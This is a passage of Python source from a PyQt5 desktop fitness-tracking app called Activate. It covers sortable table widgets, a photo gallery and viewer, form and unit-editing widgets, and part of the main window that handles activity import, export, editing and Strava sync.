"l": Qt.AlignLeft,
"c": Qt.AlignHCenter,
"r": Qt.AlignRight,
"v": Qt.AlignJustify,
}[horizontal.casefold()] | {
"b": Qt.AlignBottom,
"c": Qt.AlignVCenter,
"t": Qt.AlignTop,
"a": Qt.AlignBaseline,
}[
vertical.casefold()
]
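# Illustrative usage of aligned (not taken from the original code):
#
#     aligned("r")       # Qt.AlignRight | Qt.AlignVCenter
#     aligned("l", "t")  # Qt.AlignLeft | Qt.AlignTop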
def iterablise(obj):
"""If obj is not already iterable, form an endless iterator of it."""
try:
iter(obj)
return obj
except TypeError:
# Infinite iterator
return iter(lambda: obj, object())
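# Illustrative behaviour of iterablise (sample values only):
#
#     iterablise([1, 2, 3])       # returns the list unchanged
#     endless = iterablise(None)  # an iterator that yields None forever
#     next(endless)               # None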
def create_table_item(
item, format_function=None, unit_system=None, align=None
) -> QtWidgets.QTableWidgetItem:
"""
Create a table item that can be a FormattableNumber.
If item is a tuple, will return a table item that looks like item[1]
but sorts with item[0]. Otherwise just returns a normal table item.
"""
if isinstance(item, units.DimensionValue):
item = item.encode(unit_system)
if format_function is not None:
widget = FormattableNumber(item, format_function(item))
widget.setTextAlignment(aligned("r"))
# Format as string
else:
widget = QtWidgets.QTableWidgetItem(str(item))
if align is not None:
widget.setTextAlignment(align)
return widget
def good_minus(string):
"""Replace an initial hyphen-minuses with a real minus sign."""
if string and string[0] == "-":
return "\u2212" + string[1:]
return string
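# Illustrative examples for good_minus (sample strings only):
#
#     good_minus("-4.2")  # "\u22124.2", i.e. with a real minus sign
#     good_minus("12")    # "12", unchanged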
class FormattableNumber(QtWidgets.QTableWidgetItem):
"""A sortable, formatted number to place in a table."""
def __init__(self, number, text):
super().__init__(good_minus(text))
self.number = number
def __lt__(self, other):
return self.number < other.number
class Table(QtWidgets.QTableWidget):
unit_system = None
def resize_to_contents(self, direction="h"):
"""
Set a header to auto-resize its items.
This also stops the user resizing them, which is good because
usually resizing these things is not particularly useful.
"""
if direction == "h":
header = self.horizontalHeader()
elif direction == "v":
header = self.verticalHeader()
else:
raise ValueError(f"Invalid direction: {direction}. (Must be 'h' or 'v')")
header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
def set_item(self, row, column, value, format_function=None, align=None):
self.setItem(
row,
column,
create_table_item(value, format_function, self.unit_system, align=align),
)
def set_row(self, values, position, formats=None, alignments=None):
alignments = iterablise(alignments)
formats = iterablise(formats)
for column, (value, format_, align) in enumerate(
zip(values, formats, alignments)
):
self.set_item(position, column, value, format_, align)
def get_row_text(self, index) -> list:
result = []
for column in range(self.columnCount()):
item = self.item(index, column)
result.append(None if item is None else item.text())
return result
@property
def headings(self):
return [self.get_heading(i) for i in range(self.columnCount())]
def get_heading(self, index) -> str:
return self.horizontalHeaderItem(index).text()
class ValueColumnTable(QtWidgets.QTableWidget):
def set_units(self, unit_system):
self.unit_system = unit_system
def resize_to_contents(self, vertical=False):
if vertical:
header = self.verticalHeader()
else:
header = self.horizontalHeader()
header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
def define_columns(self, names, dimensions, format_functions=None, alignments=None):
self.setColumnCount(len(names))
self.setHorizontalHeaderLabels(
[
self.unit_system.format_name_unit(
name, self.unit_system.units[dimension].symbol
)
for name, dimension in zip(names, dimensions)
]
)
if format_functions is None:
self.format_functions = [None for _ in names]
else:
self.format_functions = format_functions
if alignments is None:
self.alignments = [None for _ in names]
else:
self.alignments = alignments
def set_item(self, row, column, value):
self.setItem(
row,
column,
create_table_item(
value,
self.format_functions[column],
self.unit_system,
self.alignments[column],
),
)
def set_row(self, values, position):
for column, value in enumerate(values):
self.set_item(position, column, value)
def __len__(self):
return self.rowCount()
class SplitTable(ValueColumnTable):
headings = ["Number", "Time", "Split", "Speed", "Net Climb", "Ascent"]
dimensions = [None, "time", "time", "speed", "altitude", "altitude"]
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[number_formats.split_format(h) for h in self.headings],
alignments=[aligned("r") for _ in self.headings],
)
self.resize_to_contents()
def update_data(self, data):
self.setRowCount(len(data))
for y, row in enumerate(data):
row_data = [y + 1] + row
self.set_row(row_data, y)
class ActivityListTable(ValueColumnTable):
headings = ["Name", "Type", "Start Time", "Distance"]
dimensions = [None, None, None, "distance"]
right_clicked = QtCore.pyqtSignal(QtCore.QEvent)
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[number_formats.list_format(h) for h in self.headings],
)
self.resize_to_contents()
self.resize_to_contents(vertical=True)
self.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
@property
def current_activity_id(self):
return self.selectedItems()[0].activity_id
def set_id_row(self, activity_id, values, position):
"""
Set the items in the given activity list row to specific values.
        Assigns activity_id to the item in column zero of the new row.
"""
self.set_row(values, position)
self.item(position, 0).activity_id = activity_id
def add_id_row(self, activity_id, values, position):
sorting_was_enabled = self.isSortingEnabled()
self.setSortingEnabled(False)
self.insertRow(position)
self.set_id_row(activity_id, values, position)
if sorting_was_enabled:
self.setSortingEnabled(True)
def default_sort(self):
self.setSortingEnabled(True)
self.sortItems(self.headings.index("Start Time"), Qt.DescendingOrder)
def mouseReleaseEvent(self, event):
if event.button() == Qt.RightButton:
self.right_clicked.emit(event)
else:
super().mouseReleaseEvent(event)
def select(self, activity_id):
for row in range(len(self)):
if self.item(row, 0).activity_id == activity_id:
self.selectRow(row)
return
def filter(self, ids):
for row in range(len(self)):
self.setRowHidden(row, self.item(row, 0).activity_id not in ids)
class SocialActivityList(ActivityListTable):
headings = ["Server", "User", "Name", "Type", "Start Time", "Distance"]
dimensions = [None, None, None, None, None, "distance"]
def filter_by_server(self, allowed):
for row in range(len(self)):
servers = self.item(row, 0).text().split("\n")
usernames = self.item(row, 1).text().split("\n")
self.setRowHidden(
row, not any(x in allowed for x in zip(servers, usernames))
)
class CurveTable(ValueColumnTable):
headings = ["Distance", "Time", "Speed"]
dimensions = [None, "time", "speed"]
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[lambda x: x, times.to_string, lambda x: str(round(x, 1))],
)
def update_data(self, good_distance_names, table):
self.setRowCount(len(table))
for index, row in enumerate(table):
self.set_row(good_distance_names[index : index + 1] + list(row[1:]), index)
class RecordsTable(CurveTable):
headings = CurveTable.headings + ["Activity"]
dimensions = CurveTable.dimensions + [None]
# An int results in an overflow issue
gone_to = QtCore.pyqtSignal(object)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.itemDoubleClicked.connect(self.go_to)
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[lambda x: x, times.to_string, lambda x: str(round(x, 1)), lambda x: x],
)
self.resize_to_contents()
def update_data(self, good_distance_names, table, activity_ids):
super().update_data(good_distance_names, table)
for row, activity_id in enumerate(activity_ids):
self.item(row, self.headings.index("Activity")).activity_id = activity_id
def go_to(self, item):
if self.headings[item.column()] == "Activity":
self.gone_to.emit(item.activity_id)
class InfoTable(Table):
"""
The table widget on the right.
This is used for distance, climb, duration etc.
"""
def set_units(self, unit_system):
self.unit_system = unit_system
def update_data(self, info: dict):
self.setRowCount(len(info))
for row, (field, value) in enumerate(info.items()):
self.set_item(row, 0, field)
self.set_item(
row, 1, value, number_formats.info_format(field), align=aligned("r")
)
self.set_item(
row,
2,
self.unit_system.units[value.dimension].symbol,
align=aligned("l"),
)
class ServersTable(Table):
headings = ["Address", "Name", "Username", "Password"]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Set up right click delete menu
self.menu = QtWidgets.QMenu(self)
self.action_delete = QtWidgets.QAction("Delete")
self.action_delete.setIcon(QIcon.fromTheme("edit-delete"))
self.menu.addAction(self.action_delete)
def set_columns(self):
self.setColumnCount(len(self.headings))
self.setHorizontalHeaderLabels(self.headings)
def set_server(self, row, server):
self.set_row(["" if x is None else x for x in dataclasses.astuple(server)], row)
def set_servers(self, servers):
self.setRowCount(len(servers))
self.set_columns()
for row, server in enumerate(servers):
self.set_server(row, server)
def get_servers(self):
return [connect.Server(*self.get_row_text(r)) for r in range(self.rowCount())]
def add_row(self):
self.setRowCount(self.rowCount() + 1)
self.set_columns()
def contextMenuEvent(self, event):
"""Open a context menu to remove a server."""
if self.menu.exec(event.globalPos()):
            self.removeRow(self.row(self.itemAt(event.pos())))


# ----- end of activate/app/tables.py -----
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import Qt
from activate.app import paths
class ClickablePhoto(QtWidgets.QLabel):
"""
A photo that can be clicked.
It may also have a right-click menu for deleting itself.
"""
clicked = QtCore.pyqtSignal(int)
deleted = QtCore.pyqtSignal(int)
def __init__(self, *args, deletable=False, **kwargs):
super().__init__(*args, **kwargs)
self.menu = QtWidgets.QMenu(self)
self._index = None
if deletable:
self.action_delete = QtWidgets.QAction("Delete")
self.action_delete.setIcon(QtGui.QIcon.fromTheme("edit-delete"))
self.action_delete.triggered.connect(self.delete)
self.menu.addAction(self.action_delete)
@property
def index(self):
if self._index is None:
return self.parent().layout().indexOf(self)
return self._index
@index.setter
def index(self, value):
self._index = value
def mouseReleaseEvent(self, event):
if event.button() == Qt.LeftButton:
self.clicked.emit(self.index)
        super().mouseReleaseEvent(event)
def contextMenuEvent(self, event):
self.menu.exec(event.globalPos())
def delete(self):
self.deleted.emit(self.index)
class Gallery(QtWidgets.QWidget):
"""A multi-row container for photos."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
        # Creating the layout with self as its parent installs it on this
        # widget, so it does not need to be assigned to an attribute.
        QtWidgets.QVBoxLayout(self)
def resizeEvent(self, event):
super().resizeEvent(event)
self.width = event.size().width()
self.height = event.size().height()
def empty(self):
"""Remove all photos in the PhotoList."""
for index in range(self.layout().count() - 1, -1, -1):
self.layout().itemAt(index).widget().setParent(None)
def replace_photos(self, filenames):
"""Replace the photos with new ones."""
self.filenames = filenames
self.empty()
row_height = 120
self.photos = [
QtGui.QPixmap(str(f)).scaledToHeight(row_height, Qt.SmoothTransformation)
for f in filenames
]
row = QtWidgets.QWidget(self)
row.setLayout(QtWidgets.QHBoxLayout(row))
width = self.space(row, 0)
for index, photo in enumerate(self.photos):
next_photo_width = photo.width()
width += next_photo_width + row.layout().spacing()
if width > self.width:
self.layout().addWidget(row)
row = QtWidgets.QWidget(self)
row.setLayout(QtWidgets.QHBoxLayout(row))
width = self.space(row, 1) + next_photo_width
photo = self.create_label(photo)
photo.index = index
row.layout().addWidget(photo)
self.layout().addWidget(row)
def create_label(self, photo):
label = ClickablePhoto(self, deletable=False)
label.setPixmap(photo)
label.clicked.connect(self.show_photos)
return label
def space(self, row, photo_count):
"""Get the required empty space for photo_count photos in row."""
return (
row.layout().spacing() * (photo_count - 1)
+ self.layout().contentsMargins().left()
+ self.layout().contentsMargins().right()
+ row.layout().contentsMargins().left()
+ row.layout().contentsMargins().right()
)
def show_photos(self, index):
"""Open the photo viewer on a photo."""
viewer = PhotoViewer(self.filenames, index)
viewer.exec()
class PhotoList(QtWidgets.QWidget):
"""A container for photos."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
        self.setLayout(QtWidgets.QHBoxLayout())
def resizeEvent(self, event):
super().resizeEvent(event)
self.width = event.size().width()
self.height = event.size().height()
def empty(self):
"""Remove all photos in the PhotoList."""
for index in range(self.layout().count() - 1, -1, -1):
self.layout().itemAt(index).widget().setParent(None)
def replace_photos(self, filenames):
"""Replace the photos with new ones."""
self.empty()
self.filenames = filenames
if not filenames:
return
self.photos = [QtGui.QPixmap(str(f)) for f in filenames]
total_aspect = sum(i.width() / i.height() for i in self.photos)
total_aspect = max(total_aspect, 2)
width = self.width - self.space(len(self.photos))
height = width / total_aspect
self.photos = [
p.scaledToHeight(height, Qt.SmoothTransformation) for p in self.photos
]
self.labels = []
for photo in self.photos:
self.add_photo(photo)
def add_photo(self, photo):
"""Add a new photo to the list."""
label = ClickablePhoto(self, deletable=True)
label.setPixmap(photo)
label.deleted.connect(self.delete)
label.clicked.connect(self.show_photos)
self.layout().addWidget(label)
self.labels.append(label)
def space(self, photo_count):
"""Get the required empty space for photo_count photos."""
return (
self.layout().spacing() * (photo_count - 1)
+ self.layout().contentsMargins().left()
+ self.layout().contentsMargins().right()
)
def show_photos(self, index):
"""Open the photo viewer on a photo."""
viewer = PhotoViewer(self.filenames, index)
viewer.exec()
def show_activity_photos(self, activity):
"""Update to showing a new activity's photos."""
self.activity = activity
self.replace_photos(activity.photos)
def delete(self, index):
"""Remove a photo from an activity."""
self.filenames.pop(index)
self.photos.pop(index)
self.replace_photos(self.filenames)
self.activity.photos = self.filenames
self.activity.save(paths.ACTIVITIES)
class PhotoViewer(QtWidgets.QDialog):
def __init__(self, photos, current_index, *args, **kwargs):
self.filenames = photos.copy()
self.current_index = current_index
self.photos = photos
super().__init__(*args, **kwargs)
self.label = QtWidgets.QLabel(self)
self.main_layout = QtWidgets.QHBoxLayout(self)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.addWidget(self.label, alignment=Qt.AlignCenter)
self.show_photo()
def show_photo(self):
"""Display a new photo.."""
photo = self.photos[self.current_index]
if not isinstance(photo, QtGui.QPixmap):
photo = QtGui.QPixmap(str(photo))
photo = photo.scaled(
self.width(), self.height(), Qt.KeepAspectRatio, Qt.SmoothTransformation
)
self.photos[self.current_index] = photo
self.label.setPixmap(photo)
def set_new_index(self, index):
"""Handle left and right keypresses."""
self.current_index = index
self.current_index %= len(self.photos)
self.show_photo()
def keyPressEvent(self, event):
if event.key() in {Qt.Key_Right, Qt.Key_Space}:
self.set_new_index(self.current_index + 1)
return
if event.key() in {Qt.Key_Left, Qt.Key_Backspace}:
self.set_new_index(self.current_index - 1)
return
super().keyPressEvent(event)
def resizeEvent(self, event):
super().resizeEvent(event)
self.photos = self.filenames.copy()
self.show_photo() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/photos.py | photos.py |
import collections
from datetime import timedelta
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from activate import activity_types, times
from activate import units as units_
from activate.app import checklist
UNIVERSAL_FLAGS = ("Commute", "Indoor")
TYPE_FLAGS = collections.defaultdict(tuple)
TYPE_FLAGS.update(activity_types.FLAGS)
EFFORT_LEVELS = (
"None",
"Very easy",
"Easy",
"Quite easy",
"Moderate",
"Quite hard",
"Hard",
"Very hard",
"Extreme",
"Maximum",
)
class ActivityFlagEdit(checklist.CheckList):
def change_options(self, activity_type):
self.row_names = TYPE_FLAGS[activity_type] + UNIVERSAL_FLAGS
class DurationEdit(QtWidgets.QFormLayout):
"""A widget to allow editing an hours minute seconds duration."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.hours_widget = QtWidgets.QSpinBox()
self.addRow("Hours", self.hours_widget)
self.minutes_widget = QtWidgets.QSpinBox()
self.minutes_widget.setRange(0, 59)
self.addRow("Minutes", self.minutes_widget)
self.seconds_widget = QtWidgets.QDoubleSpinBox()
self.seconds_widget.setRange(0, 59.99)
self.addRow("Seconds", self.seconds_widget)
def value(self):
return timedelta(
hours=self.hours_widget.value(),
minutes=self.minutes_widget.value(),
seconds=self.seconds_widget.value(),
)
def set_value(self, new: timedelta):
hours, minutes, seconds = times.hours_minutes_seconds(new)
self.hours_widget.setValue(hours)
self.minutes_widget.setValue(minutes)
self.seconds_widget.setValue(seconds)
class EffortEdit(QtWidgets.QVBoxLayout):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.slider = QtWidgets.QSlider(Qt.Horizontal, self.parent())
self.slider.setMaximum(9)
self.slider.valueChanged.connect(self.set_label)
self.slider.sliderPressed.connect(self.set_label)
self.addWidget(self.slider)
self.label = QtWidgets.QLabel("Unspecified")
self.addWidget(self.label)
def set_label(self):
self.label.setText(EFFORT_LEVELS[self.slider.value()])
def value(self):
if self.label.text() == "Unspecified":
return None
return self.slider.value()
def set_value(self, value):
if value is None:
self.slider.setValue(0)
self.label.setText("Unspecified")
else:
self.slider.setValue(value)
WIDGET_VALUES = {
QtWidgets.QLineEdit: lambda w: w.text(),
QtWidgets.QPlainTextEdit: lambda w: w.toPlainText(),
    QtWidgets.QTextEdit: lambda w: w.toPlainText(),
QtWidgets.QSpinBox: lambda w: w.value(),
QtWidgets.QDoubleSpinBox: lambda w: w.value(),
QtWidgets.QComboBox: lambda w: w.currentText(),
QtWidgets.QTimeEdit: lambda w: w.time().toPyTime(),
QtWidgets.QDateTimeEdit: lambda w: w.dateTime().toPyDateTime(),
QtWidgets.QDateEdit: lambda w: w.date().toPyDate(),
QtWidgets.QAbstractSlider: lambda w: w.value(),
QtWidgets.QKeySequenceEdit: lambda w: w.keySequence(),
checklist.CheckList: lambda w: w.num_states,
DurationEdit: lambda w: w.value(),
EffortEdit: lambda w: w.value(),
}
WIDGET_SETTERS = {
QtWidgets.QLineEdit: lambda w, v: w.setText(v),
QtWidgets.QPlainTextEdit: lambda w, v: w.setPlainText(v),
QtWidgets.QTextEdit: lambda w, v: w.setText(v),
QtWidgets.QSpinBox: lambda w, v: w.setValue(v),
QtWidgets.QDoubleSpinBox: lambda w, v: w.setValue(v),
QtWidgets.QComboBox: lambda w, v: w.setCurrentText(v),
QtWidgets.QTimeEdit: lambda w, v: w.setTime(v),
QtWidgets.QDateTimeEdit: lambda w, v: w.setDateTime(v),
QtWidgets.QDateEdit: lambda w, v: w.setDate(v),
QtWidgets.QAbstractSlider: lambda w, v: w.setValue(v),
QtWidgets.QKeySequenceEdit: lambda w, v: w.setKeySequence(v),
checklist.CheckList: lambda w, v: setattr(w, "num_states", v),
DurationEdit: lambda w, v: w.set_value(v),
EffortEdit: lambda w, v: w.set_value(v),
}
def get_value(widget):
for widget_type, function in WIDGET_VALUES.items():
if isinstance(widget, widget_type):
return function(widget)
def set_value(widget, value):
for widget_type, function in WIDGET_SETTERS.items():
if isinstance(widget, widget_type):
return function(widget, value)
class Form(QtWidgets.QFormLayout):
def __init__(self, fields, *args, **kwargs):
self.fields = fields
super().__init__(*args, **kwargs)
for (name, entry) in self.fields.items():
self.addRow(name, entry)
def values(self):
return {
name: get_value(
self.itemAt(index, self.FieldRole).widget()
or self.itemAt(index, self.FieldRole).layout()
)
for index, name in enumerate(self.fields.keys())
}
def set_values(self, values):
for index, name in enumerate(self.fields.keys()):
if name in values:
set_value(
self.itemAt(index, self.FieldRole).widget()
or self.itemAt(index, self.FieldRole).layout(),
values[name],
)
class CustomUnits(QtWidgets.QFormLayout):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.combo_boxes = {}
self.labels = list(units_.ALL.keys())
for unit, options in units_.ALL.items():
if len(options) <= 1:
continue
combo_box = QtWidgets.QComboBox()
combo_box.addItem("Default")
for option in options:
combo_box.addItem(option.name.capitalize())
self.addRow(unit.replace("_", " ").title(), combo_box)
self.combo_boxes[unit] = combo_box
def units_dict(self):
result = {}
for unit in self.combo_boxes:
value = self.combo_boxes[unit].currentText()
if value == "Default":
continue
result[unit] = value.casefold()
return result
def set_units(self, units):
for unit, value in units.items():
self.combo_boxes[unit].setCurrentIndex(
self.combo_boxes[unit].findText(value.capitalize())
) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/widgets.py | widgets.py |
import sys
import time
from contextlib import suppress
from pathlib import Path
import pkg_resources
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap
import activate.app.dialogs
import activate.app.dialogs.activity
import activate.app.dialogs.settings
from activate import (
activity,
activity_list,
files,
filetypes,
load_activity,
serialise,
track,
units,
)
from activate.app import activity_view, connect, maps, paths, settings, sync, widgets
from activate.app.ui.main import Ui_main_window
SYNC_PROGRESS_STEPS = 1000
SYNC_WAIT_DIVISIONS = 100
SYNC_DELAY = 2
GET_TICKS = round(0.3 * SYNC_WAIT_DIVISIONS)
ADD_TICKS = round(0.05 * SYNC_WAIT_DIVISIONS)
def get_unsynced_edited():
try:
return set(serialise.load(paths.UNSYNCED_EDITED))
except FileNotFoundError:
return set()
def save_unsynced_edited(data):
serialise.dump(list(data), paths.UNSYNCED_EDITED)
class MainWindow(QtWidgets.QMainWindow, Ui_main_window):
def __init__(self, activities, *args, **kwargs):
self.activities = activities
super().__init__(*args, **kwargs)
self.setupUi(self)
paths.ensure_all_present()
self.settings = settings.load_settings()
self.hide_unused_things()
self.unsynced_edited_activities = get_unsynced_edited()
# Create a global map widget to be used everywhere. This is
# necessary because pyqtlet doesn't support multiple L.map
# instances.
self.map_widget = maps.MapWidget(self, self.settings)
self.activity_summary.setup(self.unit_system, self.map_widget)
self.social_activity_summary.setup(self.unit_system, self.map_widget)
self.summary.setup(self.unit_system, self.map_widget, self.activities)
self.activity_list_table.set_units(self.unit_system)
self.social_activity_list.set_units(self.unit_system)
self.update_activity_list()
self.activity_list_table.right_clicked.connect(self.activity_list_menu)
self.summary.records_table.gone_to.connect(self.show_activity)
for widget, icon_name in (
(self.action_import, "document-open"),
(self.action_add_manual, "document-new"),
(self.action_edit, "document-edit"),
(self.action_match, "document-equal"),
(self.action_analyse, "view-statistics"),
(self.action_add_photos, "insert-image"),
(self.action_general, "settings-configure"),
(self.action_units, "measure"),
(self.action_servers, "network-server"),
(self.action_sync, "folder-sync"),
(self.action_sync_settings, "folder-sync"),
(self.export_menu, "document-send"),
(self.action_quit, "application-exit"),
):
widget.setIcon(QIcon.fromTheme(icon_name))
self.main_tab_switch(0)
def hide_unused_things(self):
self.main_tabs.setTabVisible(2, bool(self.settings.servers))
self.action_sync.setVisible(bool(self.settings.cookie))
def edit_settings(self, tab):
settings_window = activate.app.dialogs.settings.SettingsDialog()
self.settings.copy_from(settings_window.exec(self.settings, tab))
self.hide_unused_things()
def edit_general_settings(self):
self.edit_settings("General")
def edit_unit_settings(self):
self.edit_settings("Units")
def edit_server_settings(self):
self.edit_settings("Servers")
def edit_sync_settings(self):
self.edit_settings("Sync")
def add_manual_activity(self):
manual_window = activate.app.dialogs.activity.ManualActivityDialog()
data = manual_window.exec({})
if isinstance(data, dict):
self.add_activity(
activity.Activity(
data["Name"],
data["Type"],
track.ManualTrack(
data["Start Time"],
data["Distance"] * 1000,
data["Ascent"],
data["Duration"],
),
"[manual]",
data["Flags"],
data["Effort"],
data["Start Time"],
data["Distance"] * 1000,
description=data["Description"],
)
)
def update_activity_list(self):
"""Make the activity list show the correct activities."""
self.activity_list_table.setRowCount(len(self.activities))
for i, activity_ in enumerate(self.activities):
self.activity_list_table.set_id_row(
activity_.activity_id, activity_.list_row, i
)
self.activity_list_table.resizeColumnsToContents()
self.activity_list_table.default_sort()
def add_activity(self, new_activity, position=0):
"""Add an activity to list."""
activity_id = new_activity.activity_id
activity_elements = new_activity.unload(activity_list.UnloadedActivity).list_row
self.activities.add_activity(new_activity)
self.activity_list_table.add_id_row(activity_id, activity_elements, position)
def sync(self):
"""Sync with another service."""
dialog = QtWidgets.QProgressDialog("Syncing", "Cancel", 0, 0, self)
dialog.setWindowModality(Qt.WindowModal)
dialog.setMinimumDuration(0)
dialog.forceShow()
QtWidgets.qApp.processEvents()
sync.sync_state.ensure_loaded()
new_activities = sync.sync_state.sync(
{"Strava": self.settings.cookie}, self.activities
)
new_activity_count = next(new_activities)
if new_activity_count == 0:
dialog.reset()
return
dialog.setMaximum(
new_activity_count * SYNC_WAIT_DIVISIONS + GET_TICKS + ADD_TICKS
)
for progress in range(GET_TICKS, SYNC_WAIT_DIVISIONS):
dialog.setValue(progress)
time.sleep(SYNC_DELAY / SYNC_WAIT_DIVISIONS)
if dialog.wasCanceled():
dialog.reset()
return
done = False
self.activity_list_table.setSortingEnabled(False)
for index, new_activity in enumerate(new_activities):
progress += GET_TICKS
dialog.setValue(progress)
dialog.setLabelText(f"Syncing {new_activity.name}")
self.add_activity(new_activity)
progress += ADD_TICKS
dialog.setValue(progress)
if index < new_activity_count - 1:
for progress in range(progress, (index + 2) * SYNC_WAIT_DIVISIONS):
dialog.setValue(progress)
time.sleep(SYNC_DELAY / SYNC_WAIT_DIVISIONS)
if dialog.wasCanceled():
done = True
if done:
break
else:
dialog.setValue(progress + 1)
sync.sync_state.write()
self.activity_list_table.setCurrentCell(0, 0)
self.activity_list_table.setSortingEnabled(True)
self.main_tab_switch(self.main_tabs.currentIndex())
def update_activity(self, selected):
"""Show a new activity on the right on the Activities page."""
self.setUpdatesEnabled(False)
self.activity = self.activities.get_activity(
self.activity_list_table.item(selected, 0).activity_id
)
self.activity_summary.show_activity(self.activity)
self.setUpdatesEnabled(True)
def update_social_activity(self, selected):
"""Show a new activity on the right on the Social page."""
cell = self.social_activity_list.item(selected, 0)
if cell is None:
return
activity_id = cell.activity_id
self.setUpdatesEnabled(False)
try:
self.social_activity = self.social_activities.get_activity(activity_id)
except ValueError:
server = next(
s
for s in self.settings.servers
if s.name
in self.social_activities.by_id(activity_id).server.split("\n")
)
self.social_activity = activity.Activity(
**serialise.loads(
server.get_data(f"get_activity/{activity_id}"), gz=True
)
)
self.social_activities.provide_full_activity(
activity_id, self.social_activity
)
self.social_activity_summary.show_activity(self.social_activity)
self.setUpdatesEnabled(True)
def import_activities(self):
"""Import some user-given activities."""
# [1] gives file type chosen ("Activity Files (...)",
# "All Files" etc.)
filenames = QtWidgets.QFileDialog.getOpenFileNames(
self,
"Import an activity",
str(paths.HOME),
"Activity Files (*.gpx *.fit *.tcx *.gpx.gz *.fit.gz *.tcx.gz)",
)[0]
if not filenames:
return
self.activity_list_table.setSortingEnabled(False)
for filename in activate.app.dialogs.progress(
self, filenames, "Importing Activities"
):
filename = Path(filename)
try:
self.add_activity(load_activity.import_and_load(filename, paths.TRACKS))
except Exception as e:
alert_box = QtWidgets.QMessageBox()
alert_box.setText(f"Could not load {filename}:\n{e}")
alert_box.exec()
self.activity_list_table.setCurrentCell(0, 0)
self.activity_list_table.setSortingEnabled(True)
self.main_tab_switch(self.main_tabs.currentIndex())
def export_activity(self):
"""Export the original version of the activity."""
if files.has_extension(self.activity.original_name, ".gpx"):
file_type = "GPX file (*.gpx)"
elif files.has_extension(self.activity.original_name, ".fit"):
file_type = "FIT file (*.fit)"
elif files.has_extension(self.activity.original_name, ".tcx"):
file_type = "TCX file (*.tcx)"
else:
file_type = ""
out_name = files.decode_name(self.activity.original_name)
filename = QtWidgets.QFileDialog.getSaveFileName(
self, "Export Original Activity", str(paths.HOME / out_name), file_type
)[0]
if not filename:
return
self.activity.export_original(filename)
def export_as_route(self):
out_name = f"{self.activity.name}.gpx"
filename = QtWidgets.QFileDialog.getSaveFileName(
self, "Export as Route", str(paths.HOME / out_name), "GPX file (*.gpx)"
)[0]
if not filename:
return
with open(filename, "w") as f:
f.write(filetypes.gpx.to_route(self.activity))
def edit_activity_data(self):
"""
Open the Edit Activity dialog.
This then edits or deletes the activity as appropriate.
"""
previous_sport = self.activity.sport
edit_activity_dialog = (
activate.app.dialogs.activity.EditManualActivityDialog()
if self.activity.track.manual
else activate.app.dialogs.activity.EditActivityDialog()
)
return_value = edit_activity_dialog.exec(self.activity)
if not return_value:
return
# Delete activity
if return_value == activate.app.dialogs.activity.DELETE_ACTIVITY:
# Must be saved to another variable because self.activity
# changes when the row is removed
to_delete = self.activity
for row in range(len(self.activities)):
item = self.activity_list_table.item(row, 0)
if item.activity_id == to_delete.activity_id:
self.activity_list_table.removeRow(row)
break
self.activities.remove(to_delete.activity_id)
return
self.activity_list_table.setSortingEnabled(False)
for row in range(len(self.activities)):
if (
self.activity_list_table.item(row, 0).activity_id
== self.activity.activity_id
):
self.activity_list_table.set_id_row(
self.activity.activity_id,
self.activity.unload(activity_list.UnloadedActivity).list_row,
row,
)
break
self.activities.update(self.activity.activity_id)
self.update_activity(row)
self.activity_list_table.setSortingEnabled(True)
if self.activity.sport != previous_sport:
self.summary.update_activity_types_list()
self.unsynced_edited_activities.add(self.activity.activity_id)
save_unsynced_edited(self.unsynced_edited_activities)
def add_photos(self):
"""Open the Add Photos dialog."""
filenames = QtWidgets.QFileDialog.getOpenFileNames(
self,
"Add photos",
str(paths.HOME),
"Image files (*.png *.jpg *.jpeg *.gif *.bmp *.ppm *.pgm *.xpm)",
)[0]
if not filenames:
return
for filename in filenames:
self.activity.photos.append(
files.copy_to_location_renamed(Path(filename), paths.PHOTOS)
)
self.activity.save(paths.ACTIVITIES)
self.activity_summary.update()
def show_activity(self, activity_id):
self.main_tabs.setCurrentIndex(1)
self.activity_list_table.select(activity_id)
def analyse_activity(self):
"""Open a seperate window for activity analysis."""
self.activity_view = activity_view.ActivityView()
self.activity_view.setup(self.unit_system, self.map_widget)
try:
activity_ = (
self.activity
if self.main_tabs.tabText(self.main_tabs.currentIndex()) == "Activities"
else self.social_activity
)
except AttributeError:
return
self.activity_view.show_activity(activity_)
self.activity_view.closed.connect(self.activity_view_closed)
self.activity_view.create()
self.activity_view.showMaximized()
def match_activity(self):
self.activity_list_table.setUpdatesEnabled(False)
if self.action_match.text() == "Clear Match":
self.action_match.setText("Find Matching")
self.activity_list_table.filter({a.activity_id for a in self.activities})
else:
spinbox = QtWidgets.QSpinBox()
spinbox.setMinimum(1)
spinbox.setMaximum(500)
spinbox.setSuffix(" m")
tolerance = activate.app.dialogs.FormDialog(
widgets.Form({"Tolerance": spinbox})
).exec({"Tolerance": 40})
if tolerance:
tolerance = tolerance["Tolerance"]
self.activity_list_table.filter(
self.activities.get_matching(
self.activity,
tolerance=tolerance,
progress=lambda x: activate.app.dialogs.progress(
self, x, "Finding matching activities"
),
)
)
self.action_match.setText("Clear Match")
self.activity_list_table.setUpdatesEnabled(True)
def activity_view_closed(self):
